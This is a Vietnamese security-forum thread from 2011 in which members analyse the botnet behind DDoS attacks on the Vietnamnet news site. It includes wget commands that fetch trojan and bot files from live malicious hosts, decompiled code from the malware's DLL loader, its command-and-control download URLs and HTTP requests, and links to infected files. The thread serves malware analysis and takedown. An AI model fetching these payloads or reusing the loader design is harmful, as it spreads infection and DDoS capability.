banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Phân tích tính chất vài trận DDoS HVA vừa qua.  XML
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 28/08/2011 21:51:08 (+0700) | #751 | 246097
xsecure
Member

[Minus]    0    [Plus]
Joined: 06/08/2011 20:52:06
Messages: 58
Offline
[Profile] [PM]
Mấy hôm nay có lúc vào hva khó khăn,có lúc không vào được.
là người thích IT,cũng đang tập tành học hỏi IT nên theo dỏi chủ đề này rất thú vị."STL" hay "TQN" hay ai đó ở HVA đều có lý tưởng của mình.chỉ khác là chính hay tà.chính hay tà còn tuỳ vào người đọc,nghe hay cảm nhận nữa.người bảo thủ luôn cho mình là chính còn đối lập với mình là tà.
mặc dù pháp luật có khe hở nhưng không thể dựa vào đó để làm chuyện sai quấy(ai cung thấy rỏ).đó không thể là lòng yêu nước,yêu "gì đó"....mà đó là phạm pháp.sống ở đâu cũng có pháp luật hoặc luật lệ và con người phải tôn trọng nó,đó chính là tôn trọng chính mình (ý chủ quan của tôi).
việc anh em HVA đã làm là điều đáng ngưỡng mộ.(không ngại bị xâm phạm đời tư,nói xấu,hăm doạ...).
1 tổ chức đối chọi với cá nhân hoặc vài cá nhân thì không cân bằng.nhưng các anh đã tự ân bằng nó.tôi rất ngưỡng mộ các anh.
@conmale trước đây tôi đã có ý nghĩ xấu về anh.thành thật xin lỗi.
trong cái "chân chân gia gia" sự thật luôn là sự thật.sự thật có thể là tà và củng có thể là chính.đó là 2 mặt của 1 tờ giấy.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 01:40:10 (+0700) | #752 | 246112
haphan87
Member

[Minus]    0    [Plus]
Joined: 28/08/2011 09:27:24
Messages: 2
Offline
[Profile] [PM]
Hi anh TQN và conmale

Em tham gia HVA lâu mà ko post bài, theo dõi từ đợt anh re BKAV xài winrar đến lần gần đây là re đám mèo của bọn STL. Ngưỡng mộ các anh nhiều lắm.

Theo như em nhận định thì việc đính mèo vào soft diễn ra vẫn còn rất nhiều. Hôm nay em goolge sơ sơ ra cái link này (nằm trong trang thứ 2 của từ khóa "bộ ngõ tiếng việt"smilie

Code:
http://hanviquan.forumvi.com/t370-topic


trong đó chứa link tới file unikey trên mediafire (hình như đa số virus dc up lên mediafire) --> Code:
http://www.mediafire.com/?k1i01ry314xb97h


file này em chỉ up lên thử virustotal thì 4 thằng detect là malware. Các anh ngó sơ xem chúng có thuộc variant của nào của STL hay không thì theo em thấy như các anh nói trong HVA, vẫn tồn tại một số mẫu botnet khác nữa.

Khi thử post cái từ khóa "http://www.mediafire.com/?k1i01ry314xb97h" lên google thì hiện tại có những 79 trang link đến cái file virus này. Trong đó có cả 1 trang diễn đàn của bkav.

Chúc các anh chân cứng đá mềm.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 04:30:01 (+0700) | #753 | 246117
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]
Sáng nay vô thử vietnamnet thì vẫn tràn ngập trong "biển lửa". Tất cả các trang mạng thuộc vietnamnet đều chập chờn và đa số là bị lỗi 404.

Hôm trước có vô được nhưng cực kỳ chậm. Điều này chứng tỏ cho đến nay vietnamnet vẫn còn bị tấn công nặng nề, thậm chí còn nặng nề hơn mấy hôm trước. stl botnet vẫn tiếp tục "crawl" (dựa thông tin lấy từ con vmware đang chạy thử) và dường như vietnamnet ứng dụng javascript để wwwect nhưng chỉ thuần tuý wwwecting nhưng không kiểm soát cụ thể cái gì được wwwect và cái gì không được wwwect. Hơn nữa, botnet của stl đập thẳng vô những trang chính của của vietnamnet và sau đó tiếp tục "crawl" thì không có cách gì đỡ nổi.

Về mặt pháp lý, lẽ nào một trang web lớn như vietnamnet, một trong những cơ quan ngôn luận của nhà nước mà vẫn bó tay thúc thủ? Thông tin reverse đã được anh em ở HVA công bố quá đầy đủ. Các cơ quan chức năng thừa sức mạnh để làm việc xuyên qua những channel chính thức để thộp cổ bọn tội phạm này. Nếu chuyện tường lửa đã được áp dụng để cản đến mức độ từng blog mà không thể dùng tường lửa để cản các master bots thì đây quả là chuyện kỳ lạ.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 06:23:49 (+0700) | #754 | 246118
o.O.o
Member

[Minus]    0    [Plus]
Joined: 15/07/2011 00:36:59
Messages: 28
Offline
[Profile] [PM]
Sáng em vào thử vietnamnet.vn (29-08-2011 7:22 PM) tốc độ truy cập rất nhanh, gõ enter xong là ra ngay, chắc đang ngưng ddos rồi
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 06:45:43 (+0700) | #755 | 246119
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

o.O.o wrote:
Sáng em vào thử vietnamnet.vn (29-08-2011 7:22 PM) tốc độ truy cập rất nhanh, gõ enter xong là ra ngay, chắc đang ngưng ddos rồi 


Còn tớ thì thử 3 IP từ 3 quốc gia Úc, Nhật, Đức để truy cập vietnamnet hoàn toàn không được. Có lẽ vietnamnet block trọn bộ IP nước ngoài hay sao đây.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 06:50:34 (+0700) | #756 | 246120
haphan87
Member

[Minus]    0    [Plus]
Joined: 28/08/2011 09:27:24
Messages: 2
Offline
[Profile] [PM]

conmale wrote:

Còn tớ thì thử 3 IP từ 3 quốc gia Úc, Nhật, Đức để truy cập vietnamnet hoàn toàn không được. Có lẽ vietnamnet block trọn bộ IP nước ngoài hay sao đây. 


Có vẻ là Vietnamnet block hết mạng ngoài VN hay sao ấy, mình cũng không vào được.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 06:58:03 (+0700) | #757 | 246123
Dpm
Member

[Minus]    0    [Plus]
Joined: 06/04/2009 01:43:30
Messages: 85
Offline
[Profile] [PM]
Vietnamnet đang dùng kỹ thuật kiểm tra cookie,nếu anh chưa vào vnn lần nào,hoặc anh vào rồi nhưng xoá cookie đi thi cũng không thể vào đc nữa,giá trị của cookie là bất kỳ,miễn là có cookie,nếu a k vào đc,hãy add một cookie bất kỳ vào trình duyệt,hoặc thử:
`curl http://vietnamnet.vn/vn/index.html` thì chết nhưng `curl -b "a=b" http://vietnamnet.vn/vn/index.html` thì vào đc,kỹ thuật này có vể không ok cho lắm,botnet có thể thêm cookie_header dễ dàng.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 07:27:30 (+0700) | #758 | 246125
texudo
Member

[Minus]    0    [Plus]
Joined: 20/07/2011 11:14:04
Messages: 31
Offline
[Profile] [PM]

conmale wrote:
Sáng nay vô thử vietnamnet thì vẫn tràn ngập trong "biển lửa". Tất cả các trang mạng thuộc vietnamnet đều chập chờn và đa số là bị lỗi 404.

Hôm trước có vô được nhưng cực kỳ chậm. Điều này chứng tỏ cho đến nay vietnamnet vẫn còn bị tấn công nặng nề, thậm chí còn nặng nề hơn mấy hôm trước. stl botnet vẫn tiếp tục "crawl" (dựa thông tin lấy từ con vmware đang chạy thử) và dường như vietnamnet ứng dụng javascript để wwwect nhưng chỉ thuần tuý wwwecting nhưng không kiểm soát cụ thể cái gì được wwwect và cái gì không được wwwect. Hơn nữa, botnet của stl đập thẳng vô những trang chính của của vietnamnet và sau đó tiếp tục "crawl" thì không có cách gì đỡ nổi.

Về mặt pháp lý, lẽ nào một trang web lớn như vietnamnet, một trong những cơ quan ngôn luận của nhà nước mà vẫn bó tay thúc thủ? Thông tin reverse đã được anh em ở HVA công bố quá đầy đủ. Các cơ quan chức năng thừa sức mạnh để làm việc xuyên qua những channel chính thức để thộp cổ bọn tội phạm này. Nếu chuyện tường lửa đã được áp dụng để cản đến mức độ từng blog mà không thể dùng tường lửa để cản các master bots thì đây quả là chuyện kỳ lạ. 


Thực ra nó lạ mà không lạ, lạ vì bị "đánh đập bầm dập", biết thằng nào đánh mà không dám lên tiếng.
Không lạ vì nó là thực tế của nhiều sự việc ở Vietnam hiện nay. smilie

Việc Vietnamnet bị DDOS nặng nề, chỉ cần họ HO một tiếng thôi (hướng dẫn cách thức kiểm tra máy có virus hoặc 1 cái tool remove các virus này) thì chắc sức lan toả tới cộng đồng sẽ rất lớn. Mấy chục báo mạng đưa tin lại, thì virus này sẽ bị tiêu diệt hoặc sống lay lắt mà thôi.

smilie Tốt hơn hết là họ nên có một chuyên mục phòng chống VIRUS, được thế thì bà con Việt mới được nhờ. Nhưng nếu lập ra chuyên mục này, khéo "họ" lại giết chính gà nhà của mình thì mệt smilie
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 09:59:01 (+0700) | #759 | 246131
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Báo điện tử VietNamnet bị tấn công
16/08/2011 0:09
Từ khoảng 10 giờ sáng hôm qua 15.8, việc truy cập vào báo điện tử VietNamnet (VNN) tại địa chỉ vietnamnet.vn liên tục bị nghẽn.

Phản hồi từ máy chủ của VNN rất chậm, lúc được lúc không và liên tục hiện ra thông báo “Server is too busy” (Máy chủ quá tải). Đến chiều tối cùng ngày, việc truy cập vẫn rất khó khăn.

Ông Bùi Bình Minh, trợ lý Tổng biên tập VNN về công nghệ thông tin xác nhận, báo điện tử này bị tấn công DDOS (từ chối dịch vụ) ở cấp độ nhẹ. “Có khả năng đây là các tàn dư của các mạng botnet cũ được lập trình từ trước đó đến “hẹn” lại phát động tấn công chứ không hẳn là tấn công có chủ ý. Mức độ tấn công cũng không lớn”, ông Minh cho biết.

Trường Sơn

http://www.thanhnien.com.vn/Pages/20110816/Bao-dien-tu-VietNamnet-bi-tan-cong.aspx
 


Câu chuyện bi hài mà các bác không dám nói thật
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 12:19:46 (+0700) | #760 | 246139
cayaoanh830
Member

[Minus]    0    [Plus]
Joined: 13/06/2011 09:34:01
Messages: 37
Location: Nowhere
Offline
[Profile] [PM] [Email] [Yahoo!]
Không biết là không ai xem các file hay không ai muốn nói, 4 file _index.txt đều có sự thay đổi mà không ai Reply hết:
Trong đó file:
pref.firebay.cn_index.txt bị đổi thành 0 Kb
còn 3 file còn lại đổi thành 11 Kb.

Sau khi chỉnh sửa 1 chút chương trình tự download và so sánh ở trên nên up lại:
http://www.mediafire.com/download.php?w377gt143gab0aq

Bây giời nó đã được chỉnh sửa để chạy thầm lặng không còn xuất hiện bảng dos nửa.
PS: Sửa lại rồi nên không còn sử dụng code của anh TQN không sợ bị nói là đánh cắp bản quyền nữa hi hi hi...
...Yesterday - Today - Tomorrow...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 16:20:09 (+0700) | #761 | 246150
[Avatar]
dracula_
Member

[Minus]    0    [Plus]
Joined: 14/04/2011 00:24:07
Messages: 4
Offline
[Profile] [PM] [WWW]
em mới phát hiện ra máy mình bị dính Ituneshelper.exe cũng vài ngày trước đây thôi trước đó thì chỉ bít là nó sử dụng đường truyền của em làm gì đó em không để ý lắm giờ em định sử dụng HDH linux của em để xoá (lâu nay em vẫn làm thế vì hok có xài chương trình diệt virus)
Em muốn hỏi là có có cách nào gọn nhẹ xoá nó mà không ảnh hưởng đến hệ thống không. với lại có cần xoá gì nữa không vậy. cảm ơn
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 29/08/2011 16:40:28 (+0700) | #762 | 246151
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Chỉ cần xoá nó rồi vào registry search ITunesHelper.exe rồi xoá đi. Vậy thôi.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 00:07:41 (+0700) | #763 | 246176
[Avatar]
dracula_
Member

[Minus]    0    [Plus]
Joined: 14/04/2011 00:24:07
Messages: 4
Offline
[Profile] [PM] [WWW]
ờ cái máy của em cũng có mấy file trong C:\Program Files\Common Files\Intel\Intel(R) Rapid Storage Technology được nhắc đến ở các trang trước thực sự thì nó có an toàn không vậy xoá nó thì có làm sao không. em muốn hỏi thêm làm sao xem được code của mấy cái file này hay vậy ( hỏi chỉ để cho bít thôi chứ không có mục đích gì khác smilie).
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 00:39:41 (+0700) | #764 | 246177
[Avatar]
canh_nguyen
Elite Member

[Minus]    0    [Plus]
Joined: 23/08/2004 18:55:09
Messages: 775
Location: Broken dream
Offline
[Profile] [PM] [WWW] [Yahoo!] [MSN] [ICQ]
Tối lỡ uống gần 1 cốc đen đặc không ngủ được.
Lên kéo cái autoit về viết cái toy trên windows chơi thử:

http://www.mediafire.com/?ioyq3101k2l1rhm

Chức năng là monit đống links trong file sotilon.txt, nếu sau có thêm link khác thì cứ add thêm vào dòng cuối.
Nếu lần download sau có sự thay đổi sẽ ghi ngày giờ ra log file log.txt

Bạn nào dùng windows thì lập cho file stl_mon.exe 1 cái schedule vài phút run 1 lần cho nó compare.
Mình chưa test kĩ được, nếu ai dùng mà thấy có lỗi gì pm mình mình sửa smilie

Trước cứ tưởng autoit chỉ để viết virus smilie

//tí quên, có 3 folder trong đó thì đừng del cái nào đi nhé các bạn. 1 cái để chứa file download lần trước, 1 cái để chứa file tạm cho việc compare, 1 cái để move file thay đổi vào.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 08:10:38 (+0700) | #765 | 246184
vndncn
Member

[Minus]    0    [Plus]
Joined: 21/08/2006 10:38:00
Messages: 77
Offline
[Profile] [PM]
Hi anh TQN: em chạy đoạn bat ở dưới sao không thấy gì hết anh, em thấy dòng cuối cùng có ghi là ấn phím bất kỳ để tiếp tục, thế là em ấn, cái bảng biến mất tiêu luôn anh.

@echo off
echo ===============================================================================
echo Download cac file trojan, bot va DDOS config files cua stl dang DDOS Vietnamnet
echo ===============================================================================
echo.
wget -t3 "http://wide.ircop.cn/index.txt?113" -O wide.ircop.cn_index.txt
wget -t3 "http://pref.firebay.cn/index.txt?113" -O pref.firebay.cn_index.txt
wget -t3 "http://daily.leteaks.com/index.txt?113" -O daily.leteaks.com_index.txt
wget -t3 "http://link.susaks.com/index.txt?113" -O link.susaks.com_index.txt
wget -t3 "http://option.drfound.net/k113.css"

pause


Hi anh canh_nguyen: Em chạy file stl_mon.exe, MSE báo là k113[1].css là trojan. Sao vậy anh?
Em không biết dán hình MSE báo là tronjan lên đây bắng cách nào, để anh và mọi người xem.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 08:45:57 (+0700) | #766 | 246185
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Đúng rồi đấy vndncn. Sáng nay tôi vừa nhận được mail phản hồi từ MSE. Họ đã xác định k113.css là trojan:
https://www.microsoft.com/security/portal/Submission/SubmissionHistory.aspx?SubmissionId=13A47553-F32A-4AC3-8497-E5C314EEE27E
Rút kinh nghiệm, thay vì các bạn up các mẫu đang DDOS Vietnamnet cho các AVs bằng các website của họ, nếu kết quả của hệ thống phân tích tự động của họ trả về là clean, các bạn nên mail thẳng tới mail support của họ. Họ sẽ cử nhân viên manual analysis.
Ví dụ, vừa qua, một guru khét tiếng của Kaspersky (kẻ mà hacker Nga rất ghét, rất nổi tiếng về malware analysis) đã có mail hồi báo cho tôi về các mẫu fake Sanboxie, fake Itunes, IAStore, thông báo kết quả manual analysis của ông ấy, và không thằng nào lọt sổ cả smilie Ông ta có nói họ đang theo dõi hệ thống botnet này.
Tôi cũng đã gởi Fake ITunes và Fake IAStore cho bạn tôi ở Avira và MS.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 08:48:03 (+0700) | #767 | 246186
[Avatar]
bolzano_1989
Journalist

[Minus]    0    [Plus]
Joined: 30/01/2007 12:49:15
Messages: 1406
Offline
[Profile] [PM]

vndncn wrote:

Hi anh canh_nguyen: Em chạy file stl_mon.exe, MSE báo là k113[1].css là trojan. Sao vậy anh?
Em không biết dán hình MSE báo là tronjan lên đây bắng cách nào, để anh và mọi người xem.
 


Báo trojan là đúng rồi, MSE phát hiện thì càng tốt chứ sao.
Kiểm tra các file bạn nghi ngờ có virus:
http://goo.gl/m3Fb6C
http://goo.gl/EqaZt
http://goo.gl/gEF8e
Nhận mẫu virus qua FB: http://goo.gl/70Xo23
HVA Malware Response Team: kiemtravirus@gmail.com
Trợ giúp diệt virus: http://goo.gl/2bqxY
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 09:31:22 (+0700) | #768 | 246189
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Mấy ngày hôm nay, lu bu nhiều chuyện, toàn chuyện không vui, trên trời rơi xuống, nên không tiếp tục RCE mẫu IAStore được. Bà con thông cảm !

Cũng mệt mỏi và chán nãn lắm, tính bỏ ngang, nhưng nghĩ lại: đã làm là phải làm cho trót, nếu bỏ ngang thì IAStore sẽ tiếp tục download bot mới của nó về, cập nhật và tiếp tục tấn công DDOS vào Vietnamnet. Mẫu ITunes thì gần như sắp bị die rồi, các AVs hầu hết đã cập nhật, mẫu IAStore thì cứ được báo về là "Clean". Đạo đức nghề nghiệp thằng "non-IT" như tui thấy không cho phép, thấy cái sai mà phải nhắm mắt làm ngơ thì ấm ức không chịu được. Hơn nữa, tự nhủ lương tâm là mình đang làm đúng, không cố ý cố tình hại ai cả, chỉ là vô tư, không vụ lợi, bỏ chút công sức "còm" để đóng góp một tay cho cộng đồng Internet Vietnam ta.

Có lẽ từ trước tới giờ, mẫu ITStore này là mẫu khổng lồ nhất, phức tạp nhất mà tôi đã gặp. Code cực kỳ phức tạp, phân tách nhiệm vụ ra rõ ràng hết. Exe đăng ký run như một service, điều phối hoạt động của 5 dll còn lại. Mỗi dll một nhiệm vụ, dll đăng ký registry, đánh dấu lây nhiểm, 2 dll làm nhiệm vụ download, 1 dll làm nhiệm vụ giãi mã bước 1, 1 dll làm nhiệm vụ bước 2, giãi mã xong ghi xuống harddisk và run.

Bản thân chúng nếu phân tách ra phân tích từng file thì thấy hầu như là file sạch, code VC++ 2010 bình thường, code rất trong sáng, không dùng một kỹ thuật AntiRCE, antiAV, antiVM... gì cả. Nhưng nối chúng lại với nhau, tập trung ở đầu ra cuối cùng của chúng sẽ thấy.

Coder của con bot này lần này dùng hoàn toàn thư viện CryptoPP: http://www.cryptopp.com, bản mới nhất để làm nhiệm vụ encrypt các link download và để giải mã file malware download về. Và lại dùng toàn CString class của ATLMFC VC++ 2010 để làm các nhiệm vụ thao tác chuỗi (string).
Static analysis hoàn toàn rất tốn công sức, vì vậy tôi chỉ tập trung vào debug là chính.
Con IAStore này cũng mắc lỗi như tôi đã nói lúc trước:
1. Vẫn tìm nhiều cách mã hoá các string quan trọng, nhưng tới thời điểm call API của socket API thì vẫn phải lòi ra clear text.
2. Vẫn dùng cách: giã mã file malware xong, ghi xuống %Temp% rồi CreateProcessA/W, cập nhật nó xong rồi nó mới bị xoá : DeleteFileA, DeleteFileW.

Một ít miêu tã:
1. IAStorUIHelper.dll làm nhiệm vụ download, dùng pure socket API, export ra 3 hàm mạo danh. Nhưng 3 hàm này phải được bên ngoài gọi và truyền tham số vào. Hàm InvokeEx là hàm khởi tạo Windows Socket, hàm GetCLSID chính là hàm download. Nó chỉ build trong ruột User-Agent và HTTP Request string, còn toàn bộ nhận từ input parameter (tham số truyền vào) từ caller (hàm gọi). Hàm QueryInterface trả toàn bộ nội dung đã download về caller.
2. IAStorDataMgr.dll chỉ export 1 hàm duy nhất, GetInstance, cũng nhận tham số từ caller. Hàm GetInstance sẽ call và truyền tham số cho 2 hàm: GetCLSID và QueryInterface của IAStorUIHelper.dll. Hàm GetInstance parse và giãi mã bước 1 nội dung lấy về, trả về caller.
3. IAStorDataMgrSvc sẽ kiểm tra có đủ và đúng bộ dlls của nó hay không:
Code:
bool __cdecl LoadDlls()
{
    HMODULE hIAStorCommon; // eax@1
    HMODULE hIAStorUIHelper; // eax@3
    HMODULE hIAStorDataMgr; // eax@5
    HMODULE hSmartPin; // eax@7
    HMODULE hSysInftLib; // eax@9

    hIAStorCommon = LoadLibraryW(L"IAStorCommon.dll");
    if ( hIAStorCommon )
        g_pfnGetFrameInfo = GetProcAddress(hIAStorCommon, "GetFrameInfo");
    hIAStorUIHelper = LoadLibraryW(L"IAStorUIHelper.dll");
    if ( hIAStorUIHelper )
    {
        g_pfnGetCLSID = GetProcAddress(hIAStorUIHelper, "GetCLSID");
        g_pfnQueryInterface = GetProcAddress(v2, "QueryInterface");
        g_pfnInvokeEx = GetProcAddress(v2, "InvokeEx");
    }
    hIAStorDataMgr = LoadLibraryW(L"IAStorDataMgr.dll");
    if ( hIAStorDataMgr )
        g_pfnGetInstance = GetProcAddress(hIAStorDataMgr, "GetInstance");
    hSmartPin = LoadLibraryW(L"SmartPin.dll");
    if ( hSmartPin )
        g_pfnEnumSataPort = GetProcAddress(hSmartPin, "EnumSataPort");
    hSysInftLib = LoadLibraryW(L"SysInftLib.dll");
    if ( hSysInftLib )
        g_pfnWaitForSignal = GetProcAddress(hSysInftLib, "WaitForSignal");
    return g_pfnGetFrameInfo
        && g_pfnGetCLSID
        && g_pfnQueryInterface
        && g_pfnInvokeEx
        && g_pfnGetInstance
        && g_pfnEnumSataPort
        && g_pfnWaitForSignal;
}

Nếu return FALSE, nó sẽ exit. Còn nếu TRUE, nó bắt đầu làm việc download nhờ các thread và vòng loop vô tận.
EXE call InvokeEx của IAStorUIHelper.dll để khởi tạo Windows socket. Sau đó giải mã 4 link download dùng DES algorithm, truyền cho GetInstance, lấy kết quả trả về, rồi lại giãi mã một lần nữa để extract được file PE malware, ghi xuống %temp%, CreateProcess nó, wait xong delete.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 09:40:17 (+0700) | #769 | 246190
chieutuongtu
Member

[Minus]    0    [Plus]
Joined: 18/12/2007 21:40:23
Messages: 7
Offline
[Profile] [PM]
Em theo dõi topic thấy anh TQN có viết, đại ý: k vào được blogspot của gg = máy bị nhiễm STL's "mèo què".

Lúc em vào blogspot thì nó ra thông báo này.




Vậy xin hỏi cụ thể em phải làm j để giúp các anh lấy mẫu?

PS: e đang ở trường.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 09:52:54 (+0700) | #770 | 246192
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Kết quả debug ra các host của con trojan downloader IAStor này sẽ down bot về:
Code:
http://direct.fqin.net/codec.zip
 http://easy.lixns.com/codec.zip
 http://find.laxt.net/codec.zip
 http://second.xzin.net/codec.zip

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: easy.lixns.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: direct.fqin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: find.laxt.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

GET /codec.zip?id=ST0wJlBDPUtpbGxTVEwmQ0w9ezRFNUJCMzRGLTAwMDAtMDAwMC1BMUZDLUQ0NDIwQkExN0JDRH0mQ2xhc3M9NS0xLTI2MDAtMiZDaGVja3N1bTAwMT0mQ2hlY2tzdW0wMDI9JkNoZWNrc3VtMDAzPSZDaGVja3N1bTAwND0mUj0zMjY2
Host: second.xzin.net
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2; OfficeLiveConnector.1.3; OfficeLivePatch.0.0)
Connection: close
Cache-Control: no-cache

Các bạn để ý: User-Agent đặc biệt của nó và chuổi đằng sau id=. Đây là chuổi Base64 Encode, chứa thông tin lây nhiễm trên máy victim.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 30/08/2011 10:26:52 (+0700) | #771 | 246194
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]
VỀ VIỆC XÁC ĐỊNH KỸ LAI MASTER WEBSERVER CỦA STL ĐIỀU KHIỂN CUỘC TẤN CÔNG DDoS VÀO HỆ THỐNG MẠNG CỦA VIETNAMNET

1- Về master webserver này ngoài ý kiến của tôi, đã có một số ý kiến khác, như sau:

PXMMRF 25/08/2011 23:00:12 wrote:
Master webserver có thể là một trong 2 webserver này:

www.rackspace.com IP 207.97.209.147, đặt tai Mesa, AZ, United States
host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?)

Hiện nay chưa có thời gian check để xác định cụ thể là webserver nào? Vừa qua cũng chưa thấy có kết nôi download file từ webserver đến máy nạn nhân (client).

Riêng việc các bác "16 chữ vàng" đặt và vận hành được webserver ở tận Panama thì quả thật em phải ngả mũ cúi chào. Chỉ có nước các bác lắm tiền, nhiều quân thì mới đủ sức đầu tư đến tận châu Phi, châu Mỹ Latinh. Chắc nước VN chúng em thì chịu.
 


mv1098 26/08/2011 00:27:22 wrote:

@anh PXMMRF

host-200-74-244-198.ccipanama.com IP 200.74.244.198 , đặt tai Panama (không xác định được tỉnh nào?)

Nó nằm ở Panama City luôn anh à, thủ đô của nó là Panama luôn

theo suy luận của em chắc là 200.74.244.198 vì có cái nginx quen thuộc 



TQN 26/08/2011 01:51:49 wrote:


Kết quả rce sơ bộ file k113.css chứng tỏ nhận định của tui, còn một thằng nằm vùng trên máy của 1visao đã download file k113.css này về.
Dùng Plugin PE Extract của PEiD, ta extract ra được hai file .exe giống y chang ituneshelper.exe và iTunesHelper-tray.exe. Các bạn xem kỹ hình minh hoạ.
RCE vào thẳng k113.css, ta thấy lần này, coder không dùng overlay hay zip data để nhúng PE file, thay vào đó cậu ta nhúng trực tiếp 2 file exe trên vào vùng .data section luôn, cho nên plugin PE Extract dể dàng extract ra được.
……………………………………………………………….
PS: Chà, bà con thức khuya theo dõi dữ ha. Thôi đi ngủ đi bà con, gần hạ màn rồi, giờ chỉ là up các file .exe và thằng exe mạo danh k113.css (Giống cảnh sát 113 quá ha) này lên cho các AVs nhai xương, và report bad links, bad site các cái website sau cho nó đi die luôn cho rồi:
Code:
http://wide.ircop.cn
 http://pref.firebay.cn
 http://daily.leteaks.com
 http://link.susaks.com
 http://option.drfound.net


Chúc bà con ngủ ngon, cuối cùng anh em HVA ta đã đi gần tới đích sau mấy tháng trời căng thẳng, mệt mỏi với tụi "sống chết theo lệnh", "sờ ti lợn", "ét ti eo" này smilie  



